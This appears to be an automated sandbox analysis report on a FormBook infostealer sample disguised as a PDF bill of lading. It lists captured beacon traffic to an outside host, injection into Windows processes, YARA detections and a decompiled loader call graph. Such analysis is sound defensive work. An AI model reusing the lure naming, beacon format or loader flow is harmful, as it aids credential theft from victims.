                                                                                                                    Data Ascii: Qzj=3RyXe2NSbX/TIFaj+pGU5pt1D6+IHNceTijxMgTlVh9pD+YKifVeWGcpWpH3KvnverG5xcDeVgcLWP0IkAjc8NbW15Tx+VaWjZYWAhr9zEIjn1R57Rl69V0zbz2YGogirk/vWdU0E90CvadbSnhgyqovz3/GDozqUFSH2Q5aIaLR3vcsL+6tWmIFEZQpV83CLmCRMKDx18mKUItLflCeQbbQ8Gs/M8/oSVTtoQZMQliEAhGcQBZ+YJ4eiL4cmyURDLnz1+VIGbmQva4SLw1278ZwJaFjYWSF0xy9qbdYepmxa40zAjbnYkTDfPoaRdylMjt5IF7pWFg43E9ET18PY8F9soHHT/bdG+AvAO6s5pCmUZfJP+StqUZ4TYiKQ5jlhZsUdFiCDmj8Zaw9Oc58p8Vc07LwxmpfgMC4p+/ASxZk74h5tP9AKxqKpejre2l56H2ooAPhvIVTjSc+fnwhsFY3grjgVEIhpUoqDGXDa+b6esBhFKjikTxOwCtDhTIBHREmHkG94mRSLV4c7sVjj3s5QC6h+NbI+ASdgje1BXLdxvwYp9EkbB7KdfqNj93/BGK+kUBkxNOffGNdgaLVhAkm74Qdc0IBtN0gdmj1A8Oj5jlv3IibM8APmtooOYIyK1YdugsVf0ikh8hdEdXmNfEtVyFnQ0qVUQ7DIxR+w4OOPQCNxxBsojeU9gtDmaU1d+csoULihF50cnCFU8MveFJz5nFt6AdCyKssC+DPME1Pvzx2LuhA8f2MkWULAUok36La3Q31uB3iVTY0eEsjeyDYVNlTMvi0vZOP1TnVHsJBARin7lq8fnofCHmKYJm9SQhr//RrrneM0cSGQXEr0PGOOOWp3hD2q8LF2IfkaYU1WVNDIXShL9HIAqPBgTGNOouhIaWqaRpuBz7aYYu1KKysZgjkaqTJ9gO7VyjpG8nEj2w/Zm+du/pIuW4i0Iw1fXk2fRIZyOZUwsDUesI5reMQ8QEnIp68CeRWmbaZzQCQeJl3 [TRUNCATED]


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    52192.168.2.4500543.33.130.19080
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:10:13.824707031 CEST538OUTGET /el3s/?Qzj=6Ta3dC1SbFexLGaAyK/XrrF8DJnhB8YLWm/0OzXEbXNGBqYW7sBnSGIWAqT2FNWebLiZ+YaCaloaRZMkiWHL3ouL7ZTQk1OjsJsHDhDi+W4oi2FDqh4Gk0M=&Znyl=2rnxDB HTTP/1.1
                                                                                                                    Host: www.barbequecritics.com
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Oct 24, 2024 05:10:14.590037107 CEST391INHTTP/1.1 200 OK
                                                                                                                    Server: openresty
                                                                                                                    Date: Thu, 24 Oct 2024 03:10:14 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 251
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 7a 6a 3d 36 54 61 33 64 43 31 53 62 46 65 78 4c 47 61 41 79 4b 2f 58 72 72 46 38 44 4a 6e 68 42 38 59 4c 57 6d 2f 30 4f 7a 58 45 62 58 4e 47 42 71 59 57 37 73 42 6e 53 47 49 57 41 71 54 32 46 4e 57 65 62 4c 69 5a 2b 59 61 43 61 6c 6f 61 52 5a 4d 6b 69 57 48 4c 33 6f 75 4c 37 5a 54 51 6b 31 4f 6a 73 4a 73 48 44 68 44 69 2b 57 34 6f 69 32 46 44 71 68 34 47 6b 30 4d 3d 26 5a 6e 79 6c 3d 32 72 6e 78 44 42 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Qzj=6Ta3dC1SbFexLGaAyK/XrrF8DJnhB8YLWm/0OzXEbXNGBqYW7sBnSGIWAqT2FNWebLiZ+YaCaloaRZMkiWHL3ouL7ZTQk1OjsJsHDhDi+W4oi2FDqh4Gk0M=&Znyl=2rnxDB"}</script></head></html>


                                                                                                                    Statistics

                                                                                                                    CPU Usage

                                                                                                                    Click to jump to process

                                                                                                                    Memory Usage

                                                                                                                    Click to jump to process

                                                                                                                    High Level Behavior Distribution

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Behavior

                                                                                                                    Click to jump to process

                                                                                                                    System Behavior

                                                                                                                    General

                                                                                                                    Target ID:0
                                                                                                                    Start time:23:06:05
                                                                                                                    Start date:23/10/2024
                                                                                                                    Path:C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe"
                                                                                                                    Imagebase:0x400000
                                                                                                                    File size:1'326'841 bytes
                                                                                                                    MD5 hash:0B14AB0AC2F8E44D3F3CFD8FCDBE6D30
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:1
                                                                                                                    Start time:23:06:06
                                                                                                                    Start date:23/10/2024
                                                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe"
                                                                                                                    Imagebase:0xff0000
                                                                                                                    File size:46'504 bytes
                                                                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2196592911.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2196592911.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2197276095.0000000006A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2197276095.0000000006A00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2195135804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2195135804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:5
                                                                                                                    Start time:23:06:43
                                                                                                                    Start date:23/10/2024
                                                                                                                    Path:C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe"
                                                                                                                    Imagebase:0x200000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4198331261.0000000005AF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4198331261.0000000005AF0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:6
                                                                                                                    Start time:23:06:45
                                                                                                                    Start date:23/10/2024
                                                                                                                    Path:C:\Windows\SysWOW64\write.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\SysWOW64\write.exe"
                                                                                                                    Imagebase:0x330000
                                                                                                                    File size:10'240 bytes
                                                                                                                    MD5 hash:3D6FDBA2878656FA9ECB81F6ECE45703
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4198403561.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4198403561.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4197079082.00000000023B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4197079082.00000000023B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4198283199.0000000004110000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4198283199.0000000004110000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:7
                                                                                                                    Start time:23:06:58
                                                                                                                    Start date:23/10/2024
                                                                                                                    Path:C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe"
                                                                                                                    Imagebase:0x200000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4200186991.00000000050F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4200186991.00000000050F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:8
                                                                                                                    Start time:23:07:10
                                                                                                                    Start date:23/10/2024
                                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                    Imagebase:0x7ff6bf500000
                                                                                                                    File size:676'768 bytes
                                                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Disassembly

                                                                                                                    Reset < >

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:3%
                                                                                                                      Dynamic/Decrypted Code Coverage:2.7%
                                                                                                                      Signature Coverage:3.9%
                                                                                                                      Total number of Nodes:1411
                                                                                                                      Total number of Limit Nodes:33
                                                                                                                      execution_graph 83116 40f110 RegOpenKeyExW 83117 40f13c RegQueryValueExW RegCloseKey 83116->83117 83118 40f15f 83116->83118 83117->83118 83119 429212 83124 410b90 83119->83124 83125 410b9a __write_nolock 83124->83125 83144 41171a 83125->83144 83129 410c66 _wcsncat 83159 413e3c 83129->83159 83132 41171a 75 API calls 83133 410ca3 _wcscpy 83132->83133 83134 410cd1 RegOpenKeyExW 83133->83134 83135 429bc3 RegQueryValueExW 83134->83135 83136 410cf7 83134->83136 83137 429cd9 RegCloseKey 83135->83137 83139 429bf2 _wcscat _wcslen _wcsncpy 83135->83139 83141 411421 83136->83141 83138 41171a 75 API calls 83138->83139 83139->83138 83140 429cd8 83139->83140 83140->83137 83234 4113e5 83141->83234 83143 41142e 83146 411724 83144->83146 83147 410c31 GetModuleFileNameW 83146->83147 83149 411740 std::bad_alloc::bad_alloc 83146->83149 83162 4138ba 83146->83162 83180 411afc 6 API calls __decode_pointer 83146->83180 83156 413db0 83147->83156 83153 411421 __cinit 74 API calls 83149->83153 83155 411766 83149->83155 83151 411770 83182 41805b RaiseException 83151->83182 83153->83155 83154 41177e 83181 4116fd 67 API calls std::exception::exception 83155->83181 83192 413b95 83156->83192 83222 41abec 83159->83222 83163 41396d 83162->83163 83172 4138cc 83162->83172 83190 411afc 6 API calls __decode_pointer 83163->83190 83165 413973 83191 417f23 67 API calls __getptd_noexit 83165->83191 83170 413929 RtlAllocateHeap 83170->83172 83171 4138dd 83171->83172 83183 418252 67 API calls 2 library calls 83171->83183 83184 4180a7 67 API calls 7 library calls 83171->83184 83185 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 83171->83185 83172->83170 83172->83171 83174 413959 83172->83174 83177 41395e 83172->83177 83179 413965 83172->83179 83186 41386b 67 API calls 4 library calls 83172->83186 83187 411afc 6 API calls __decode_pointer 83172->83187 83188 417f23 67 API calls __getptd_noexit 83174->83188 83189 417f23 67 API calls __getptd_noexit 83177->83189 83179->83146 83180->83146 83181->83151 83182->83154 83183->83171 83184->83171 83186->83172 83187->83172 83188->83177 83189->83179 83190->83165 83191->83179 83193 413c2f 83192->83193 83198 413bae 83192->83198 83194 413d60 83193->83194 83195 413d7b 83193->83195 83218 417f23 67 API calls __getptd_noexit 83194->83218 83220 417f23 67 API calls __getptd_noexit 83195->83220 83198->83193 83210 413c1d 83198->83210 83214 41ab19 67 API calls _wcsftime_l_stat 83198->83214 83199 413d65 83204 413cfb 83199->83204 83219 417ebb 6 API calls 2 library calls 83199->83219 83202 413d03 83202->83193 83202->83204 83206 413d8e 83202->83206 83203 413cb9 83203->83193 83205 413cd6 83203->83205 83216 41ab19 67 API calls _wcsftime_l_stat 83203->83216 83204->83129 83205->83193 83205->83204 83209 413cef 83205->83209 83221 41ab19 67 API calls _wcsftime_l_stat 83206->83221 83217 41ab19 67 API calls _wcsftime_l_stat 83209->83217 83210->83193 83213 413c9b 83210->83213 83215 41ab19 67 API calls _wcsftime_l_stat 83210->83215 83213->83202 83213->83203 83214->83210 83215->83213 83216->83205 83217->83204 83218->83199 83220->83199 83221->83204 83223 41ac02 83222->83223 83224 41abfd 83222->83224 83231 417f23 67 API calls __getptd_noexit 83223->83231 83224->83223 83227 41ac22 83224->83227 83229 410c99 83227->83229 83233 417f23 67 API calls __getptd_noexit 83227->83233 83229->83132 83230 41ac07 83232 417ebb 6 API calls 2 library calls 83230->83232 83231->83230 83233->83230 83235 4113f1 __msize 83234->83235 83242 41181b 83235->83242 83241 411412 __msize 83241->83143 83268 418407 83242->83268 83244 4113f6 83245 4112fa 83244->83245 83333 4169e9 TlsGetValue 83245->83333 83248 4169e9 __decode_pointer 6 API calls 83249 41131e 83248->83249 83250 4113a1 83249->83250 83343 4170e7 68 API calls 4 library calls 83249->83343 83265 41141b 83250->83265 83252 41133c 83253 411388 83252->83253 83256 411357 83252->83256 83257 411366 83252->83257 83254 41696e __encode_pointer 6 API calls 83253->83254 83255 411396 83254->83255 83259 41696e __encode_pointer 6 API calls 83255->83259 83344 417047 73 API calls _realloc 83256->83344 83257->83250 83258 411360 83257->83258 83258->83257 83262 41137c 83258->83262 83345 417047 73 API calls _realloc 83258->83345 83259->83250 83346 41696e TlsGetValue 83262->83346 83263 411376 83263->83250 83263->83262 83358 411824 83265->83358 83269 41841c 83268->83269 83270 41842f EnterCriticalSection 83268->83270 83275 418344 83269->83275 83270->83244 83272 418422 83272->83270 83303 4117af 67 API calls 3 library calls 83272->83303 83274 41842e 83274->83270 83276 418350 __msize 83275->83276 83277 418360 83276->83277 83278 418378 83276->83278 83304 418252 67 API calls 2 library calls 83277->83304 83286 418386 __msize 83278->83286 83307 416fb6 83278->83307 83281 418365 83305 4180a7 67 API calls 7 library calls 83281->83305 83284 4183a7 83289 418407 __lock 67 API calls 83284->83289 83285 418398 83313 417f23 67 API calls __getptd_noexit 83285->83313 83286->83272 83287 41836c 83306 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 83287->83306 83291 4183ae 83289->83291 83293 4183e2 83291->83293 83294 4183b6 83291->83294 83295 413a88 ___crtsetenv 67 API calls 83293->83295 83314 4189e6 InitializeCriticalSectionAndSpinCount __msize 83294->83314 83297 4183d3 83295->83297 83329 4183fe LeaveCriticalSection _doexit 83297->83329 83298 4183c1 83298->83297 83315 413a88 83298->83315 83301 4183cd 83328 417f23 67 API calls __getptd_noexit 83301->83328 83303->83274 83304->83281 83305->83287 83308 416fbf 83307->83308 83309 4138ba _malloc 66 API calls 83308->83309 83310 416ff5 83308->83310 83311 416fd6 Sleep 83308->83311 83309->83308 83310->83284 83310->83285 83312 416feb 83311->83312 83312->83308 83312->83310 83313->83286 83314->83298 83316 413a94 __msize 83315->83316 83317 418407 __lock 65 API calls 83316->83317 83322 413b0d __dosmaperr __msize 83316->83322 83327 413ad3 83316->83327 83324 413aab ___sbh_find_block 83317->83324 83318 413ae8 RtlFreeHeap 83319 413afa 83318->83319 83318->83322 83332 417f23 67 API calls __getptd_noexit 83319->83332 83321 413aff GetLastError 83321->83322 83322->83301 83323 413ac5 83331 413ade LeaveCriticalSection _doexit 83323->83331 83324->83323 83330 419f9d __VEC_memcpy VirtualFree VirtualFree HeapFree __cftoe2_l 83324->83330 83327->83318 83327->83322 83328->83297 83329->83286 83330->83323 83331->83327 83332->83321 83334 416a01 83333->83334 83335 416a22 GetModuleHandleW 83333->83335 83334->83335 83338 416a0b TlsGetValue 83334->83338 83336 416a32 83335->83336 83337 416a3d GetProcAddress 83335->83337 83356 41177f Sleep GetModuleHandleW 83336->83356 83342 41130e 83337->83342 83341 416a16 83338->83341 83340 416a38 83340->83337 83340->83342 83341->83335 83341->83342 83342->83248 83343->83252 83344->83258 83345->83263 83347 4169a7 GetModuleHandleW 83346->83347 83348 416986 83346->83348 83349 4169c2 GetProcAddress 83347->83349 83350 4169b7 83347->83350 83348->83347 83351 416990 TlsGetValue 83348->83351 83353 41699f 83349->83353 83357 41177f Sleep GetModuleHandleW 83350->83357 83354 41699b 83351->83354 83353->83253 83354->83347 83354->83353 83355 4169bd 83355->83349 83355->83353 83356->83340 83357->83355 83361 41832d LeaveCriticalSection 83358->83361 83360 411420 83360->83241 83361->83360 83362 409030 83376 409110 117 API calls 83362->83376 83364 42ceb6 83390 410ae0 VariantClear ctype 83364->83390 83366 42cebf 83367 40906e 83367->83364 83368 42cea9 83367->83368 83370 4090a4 83367->83370 83389 45e62e 116 API calls 3 library calls 83368->83389 83377 404160 83370->83377 83373 4090f0 ctype 83375 4090be ctype 83375->83373 83385 4092c0 83375->83385 83376->83367 83378 4092c0 VariantClear 83377->83378 83379 40416e 83378->83379 83391 404120 83379->83391 83381 40419b 83395 40efe0 83381->83395 83403 4734b7 83381->83403 83382 4041c6 83382->83364 83382->83375 83386 4092c8 ctype 83385->83386 83387 429db0 VariantClear 83386->83387 83388 4092d5 ctype 83386->83388 83387->83388 83388->83375 83389->83364 83390->83366 83392 40412e 83391->83392 83393 4092c0 VariantClear 83392->83393 83394 404138 83393->83394 83394->83381 83396 40eff5 CreateFileW 83395->83396 83397 4299bf 83395->83397 83399 40f017 83396->83399 83398 4299c4 CreateFileW 83397->83398 83397->83399 83398->83399 83400 4299ea 83398->83400 83399->83382 83447 40e0d0 SetFilePointerEx SetFilePointerEx 83400->83447 83402 4299f5 83402->83399 83448 453063 83403->83448 83406 473545 83452 463c42 83406->83452 83407 47350c 83409 4092c0 VariantClear 83407->83409 83415 473514 83409->83415 83410 473558 83411 47355c 83410->83411 83427 473595 83410->83427 83412 4092c0 VariantClear 83411->83412 83421 473564 83412->83421 83413 473616 83465 463d7e 83413->83465 83415->83382 83416 473622 83418 473697 83416->83418 83419 47362c 83416->83419 83417 453063 111 API calls 83417->83427 83499 457838 83418->83499 83422 4092c0 VariantClear 83419->83422 83421->83382 83425 473634 83422->83425 83425->83382 83426 473655 83430 4092c0 VariantClear 83426->83430 83427->83413 83427->83417 83427->83426 83511 462f5a 87 API calls __wcsicoll 83427->83511 83440 47365d 83430->83440 83431 4736b0 83512 45e62e 116 API calls 3 library calls 83431->83512 83432 4736c9 83513 40e7e0 76 API calls 83432->83513 83435 4736ba GetCurrentProcess TerminateProcess 83435->83432 83436 4736db 83443 4736ff 83436->83443 83514 40d030 76 API calls 83436->83514 83438 473731 83444 473744 FreeLibrary 83438->83444 83445 47374b 83438->83445 83439 4736f1 83515 46b945 134 API calls 2 library calls 83439->83515 83440->83382 83443->83438 83516 40d030 76 API calls 83443->83516 83517 46b945 134 API calls 2 library calls 83443->83517 83444->83445 83445->83382 83447->83402 83449 45307a 83448->83449 83450 45306e 83448->83450 83449->83406 83449->83407 83450->83449 83518 452e2a 111 API calls 5 library calls 83450->83518 83519 45335b 76 API calls 83452->83519 83454 463c5d 83520 442c52 80 API calls _wcslen 83454->83520 83456 463c72 83464 463cac 83456->83464 83521 40c060 83456->83521 83461 463ca4 83527 40c740 83461->83527 83463 463cf7 83463->83410 83464->83463 83532 462f5a 87 API calls __wcsicoll 83464->83532 83466 453063 111 API calls 83465->83466 83467 463d99 83466->83467 83468 463de0 83467->83468 83469 463dca 83467->83469 83544 40c760 78 API calls 83468->83544 83543 453081 111 API calls 83469->83543 83472 463de7 83492 463e19 83472->83492 83545 40c760 78 API calls 83472->83545 83473 463dd0 LoadLibraryW 83481 463e09 83473->83481 83475 463e3e 83477 463e4e 83475->83477 83478 463e7b 83475->83478 83476 463dfb 83476->83492 83546 40c760 78 API calls 83476->83546 83547 40d500 75 API calls 83477->83547 83549 40c760 78 API calls 83478->83549 83481->83475 83481->83492 83483 463e57 83548 45efe7 77 API calls ctype 83483->83548 83484 463e82 GetProcAddress 83487 463e90 83484->83487 83486 463e62 GetProcAddress 83489 463e79 83486->83489 83488 463edf 83487->83488 83487->83489 83487->83492 83488->83492 83493 463eef FreeLibrary 83488->83493 83489->83487 83550 403470 75 API calls _realloc 83489->83550 83491 463eb4 83551 40d500 75 API calls 83491->83551 83492->83416 83493->83492 83495 463ebd 83552 45efe7 77 API calls ctype 83495->83552 83497 463ec8 GetProcAddress 83553 401330 ctype 83497->83553 83500 457a4c 83499->83500 83501 45785f _strcat _wcslen _wcscpy ctype 83499->83501 83507 410d40 83500->83507 83501->83500 83502 443576 78 API calls 83501->83502 83503 40c760 78 API calls 83501->83503 83504 4138ba 67 API calls _malloc 83501->83504 83505 453081 111 API calls 83501->83505 83554 40f580 83501->83554 83502->83501 83503->83501 83504->83501 83505->83501 83508 410d55 83507->83508 83509 410ded VirtualProtect 83508->83509 83510 410dbb 83508->83510 83509->83510 83510->83431 83510->83432 83511->83427 83512->83435 83513->83436 83514->83439 83515->83443 83516->83443 83517->83443 83518->83449 83519->83454 83520->83456 83522 41171a 75 API calls 83521->83522 83523 40c088 83522->83523 83524 41171a 75 API calls 83523->83524 83525 40c096 83524->83525 83526 4608ce 75 API calls _realloc 83525->83526 83526->83461 83528 40c752 83527->83528 83529 40c747 83527->83529 83528->83464 83529->83528 83533 402ae0 83529->83533 83531 42a572 _realloc 83531->83464 83532->83463 83534 42a06a 83533->83534 83535 402aef 83533->83535 83540 401380 83534->83540 83535->83531 83537 42a072 83538 41171a 75 API calls 83537->83538 83539 42a095 _realloc 83538->83539 83539->83531 83541 41171a 75 API calls 83540->83541 83542 401387 83541->83542 83542->83537 83543->83473 83544->83472 83545->83476 83546->83481 83547->83483 83548->83486 83549->83484 83550->83491 83551->83495 83552->83497 83553->83488 83555 429440 83554->83555 83556 40f589 _wcslen 83554->83556 83557 40f58f WideCharToMultiByte 83556->83557 83558 40f5d8 83557->83558 83559 40f5ad 83557->83559 83558->83501 83560 41171a 75 API calls 83559->83560 83561 40f5bb WideCharToMultiByte 83560->83561 83561->83501 83562 4034b0 83563 4034b9 83562->83563 83564 4034bd 83562->83564 83565 42a0ba 83564->83565 83566 41171a 75 API calls 83564->83566 83567 4034fe _realloc ctype 83566->83567 83568 4022d63 83569 4022d6a 83568->83569 83570 4022d72 83569->83570 83571 4022e08 83569->83571 83575 4022a18 83570->83575 83588 40236b8 9 API calls 83571->83588 83574 4022def 83589 4020408 83575->83589 83578 4022ae8 CreateFileW 83579 4022ab7 83578->83579 83582 4022af5 83578->83582 83580 4022b11 VirtualAlloc 83579->83580 83579->83582 83586 4022c18 CloseHandle 83579->83586 83587 4022c28 VirtualFree 83579->83587 83592 4023928 GetPEB 83579->83592 83581 4022b32 ReadFile 83580->83581 83580->83582 83581->83582 83583 4022b50 VirtualAlloc 83581->83583 83584 4022d12 83582->83584 83585 4022d04 VirtualFree 83582->83585 83583->83579 83583->83582 83584->83574 83585->83584 83586->83579 83587->83579 83588->83574 83594 40238c8 GetPEB 83589->83594 83591 4020a93 83591->83579 83593 4023952 83592->83593 83593->83578 83595 40238f2 83594->83595 83595->83591 83596 4161c2 83597 4161d3 83596->83597 83631 41aa31 HeapCreate 83597->83631 83600 416212 83633 416e29 GetModuleHandleW 83600->83633 83604 416223 __RTC_Initialize 83667 41b669 83604->83667 83607 416231 83608 41623d GetCommandLineW 83607->83608 83736 4117af 67 API calls 3 library calls 83607->83736 83682 42235f GetEnvironmentStringsW 83608->83682 83611 41623c 83611->83608 83612 41624c 83688 4222b1 GetModuleFileNameW 83612->83688 83614 416256 83615 416261 83614->83615 83737 4117af 67 API calls 3 library calls 83614->83737 83692 422082 83615->83692 83619 416272 83705 41186e 83619->83705 83622 416279 83624 416284 __wwincmdln 83622->83624 83739 4117af 67 API calls 3 library calls 83622->83739 83711 40d7f0 83624->83711 83627 4162b3 83741 411a4b 67 API calls _doexit 83627->83741 83630 4162b8 __msize 83632 416206 83631->83632 83632->83600 83734 41616a 67 API calls 3 library calls 83632->83734 83634 416e44 83633->83634 83635 416e3d 83633->83635 83636 416fac 83634->83636 83637 416e4e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 83634->83637 83742 41177f Sleep GetModuleHandleW 83635->83742 83752 416ad5 70 API calls 2 library calls 83636->83752 83639 416e97 TlsAlloc 83637->83639 83643 416218 83639->83643 83644 416ee5 TlsSetValue 83639->83644 83641 416e43 83641->83634 83643->83604 83735 41616a 67 API calls 3 library calls 83643->83735 83644->83643 83645 416ef6 83644->83645 83743 411a69 6 API calls 4 library calls 83645->83743 83647 416efb 83648 41696e __encode_pointer 6 API calls 83647->83648 83649 416f06 83648->83649 83650 41696e __encode_pointer 6 API calls 83649->83650 83651 416f16 83650->83651 83652 41696e __encode_pointer 6 API calls 83651->83652 83653 416f26 83652->83653 83654 41696e __encode_pointer 6 API calls 83653->83654 83655 416f36 83654->83655 83744 41828b InitializeCriticalSectionAndSpinCount __alloc_osfhnd 83655->83744 83657 416f43 83657->83636 83658 4169e9 __decode_pointer 6 API calls 83657->83658 83659 416f57 83658->83659 83659->83636 83745 416ffb 83659->83745 83662 4169e9 __decode_pointer 6 API calls 83663 416f8a 83662->83663 83663->83636 83664 416f91 83663->83664 83751 416b12 67 API calls 5 library calls 83664->83751 83666 416f99 GetCurrentThreadId 83666->83643 83771 41718c 83667->83771 83669 41b675 GetStartupInfoA 83670 416ffb __calloc_crt 67 API calls 83669->83670 83678 41b696 83670->83678 83671 41b8b4 __msize 83671->83607 83672 41b831 GetStdHandle 83677 41b7fb 83672->83677 83673 41b896 SetHandleCount 83673->83671 83674 416ffb __calloc_crt 67 API calls 83674->83678 83675 41b843 GetFileType 83675->83677 83676 41b77e 83676->83671 83676->83677 83680 41b7a7 GetFileType 83676->83680 83772 4189e6 InitializeCriticalSectionAndSpinCount __msize 83676->83772 83677->83671 83677->83672 83677->83673 83677->83675 83773 4189e6 InitializeCriticalSectionAndSpinCount __msize 83677->83773 83678->83671 83678->83674 83678->83676 83678->83677 83680->83676 